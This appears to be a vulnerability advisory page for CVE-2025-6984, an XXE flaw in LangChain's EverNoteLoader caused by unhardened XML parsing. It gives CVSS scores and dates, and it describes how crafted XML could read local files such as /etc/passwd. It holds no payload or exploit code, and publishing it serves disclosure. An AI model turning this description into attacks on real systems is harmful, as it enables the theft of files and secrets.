CVE-2025-6984 HIGH

CVE-2025-6984: Sensitive Information Disclosure Due to Insecure XML Parsing in langchain-ai/langchain

Vendor Langchain-Ai

Product langchain-ai/langchain

Weakness CWE-200 · Info exposure

Published September 4, 2025

Last update September 4, 2025

View on NVD All CVEs

CVSS base score

7.5/10

Attack vector Network

Attack complexity Low

Privileges required None

User interaction None

Confidentiality High

Integrity None

CVSS vector

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

What the vulnerability does

01Description

The langchain-ai/langchain project, specifically the EverNoteLoader component, is vulnerable to XML External Entity (XXE) attacks due to insecure XML parsing. The affected version is 0.3.63. The vulnerability arises from the use of etree.iterparse() without disabling external entity references, which can lead to sensitive information disclosure. An attacker could exploit this by crafting a malicious XML payload that references local files, potentially exposing sensitive data such as /etc/passwd.

Key dates

02Disclosure timeline

September 4, 2025 CVE published

September 4, 2025 Record updated

External resources

03References

NVD — National Vulnerability Database https://nvd.nist.gov/vuln/detail/CVE-2025-6984 CWE — Common Weakness Enumeration https://cwe.mitre.org/data/definitions/200.html

Related vulnerabilities

Identifiers

CVE CVE-2025-6984

CWE CWE-200

CVSS 7.5 / HIGH

Affected versions